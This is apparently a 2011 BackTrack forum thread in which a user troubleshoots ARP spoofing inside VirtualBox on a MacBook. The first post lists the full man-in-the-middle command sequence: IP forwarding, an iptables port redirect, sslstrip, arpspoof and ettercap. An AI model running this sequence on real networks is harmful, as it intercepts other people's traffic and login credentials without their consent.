Results 1 to 2 of 2

Thread: arpspoofing on MBP + VBOX issues.

  1. #1
    Just burned his ISO
    Join Date
    Nov 2011

    Default arpspoofing on MBP + VBOX issues.

    I've got BT5 R1 running on my macbook pro, (2010 15" i7 osx 10.6.7? (snow leopard)).

    I'm running a awus036h on it along with virtual box.

    My problem is that I am unable to forward correctly. Yes I have enabled port forwarding properly, and when I wireshark it, I see the arp's sent.
    This is weird because, I can arpspoof properly on my windows PC. and arpspoof in a real partition'd BT5 in my macbook.
    I've also configured my etter.conf file's uid+eid(? the first two lines) to 0 , enabled the ip table redirects.

    I can sometimes get it to forward correctly.. but it will run very slow. Other times it'll just give a DOS(server not found) error on the target PC.
    I really want to take advantage of using both osx and bt5 together.. Has anyone else got it to work? Or any ideas?

    Here are my steps on doing it with sslstrip:

    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    sslstrip -l 10000
     arpspoof -i wlan0 -t
    ettercap -Tq -i wlan0
    I've tried ettercap -G, but the graphical interface just crashes everytime i try to look for hosts. ettercap -C doesn't crash and gives no problems, except for the DOS errors.
    I've tried installing another setup of BT5 with VBox, doesn't work..
    Also does anyone know if it's supposed to detect my alfa as a awus036h, cause its detecting it as IEEE80211 I think.

    Thanks! Looking forward to some responses.
    Last edited by jenxin; 11-10-2011 at 04:54 PM.

  2. #2
    Just burned his ISO
    Join Date
    Nov 2011

    Default Re: arpspoofing on MBP + VBOX issues.

    I believe the issue is entirely in ettercap. But I don't know why ettercap works fine outside of virtualbox on mac.. Also, My alfa is running very slow compared to my airport extreme. Normally I get 12Mbps on my airport, but when using the alfa, I only manage to top out around 4-5 Mbps. Anyone got a idea? (TXpower at 30)

Similar Threads

  1. VBOX Failed
    By pjsp92 in forum BackTrack 5 Beginners Section
    Replies: 3
    Last Post: 12-05-2011, 11:52 AM
  2. How to select 'all' in arpspoofing (bt4)?
    By Azzyh in forum Beginners Forum
    Replies: 2
    Last Post: 01-19-2011, 05:53 PM
  3. UFW and arpspoofing tip
    By moobius in forum Experts Forum
    Replies: 0
    Last Post: 03-03-2010, 05:35 AM
  4. Connexion very slow when arpspoofing
    By haffouff in forum OLD Newbie Area
    Replies: 0
    Last Post: 07-22-2009, 02:33 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts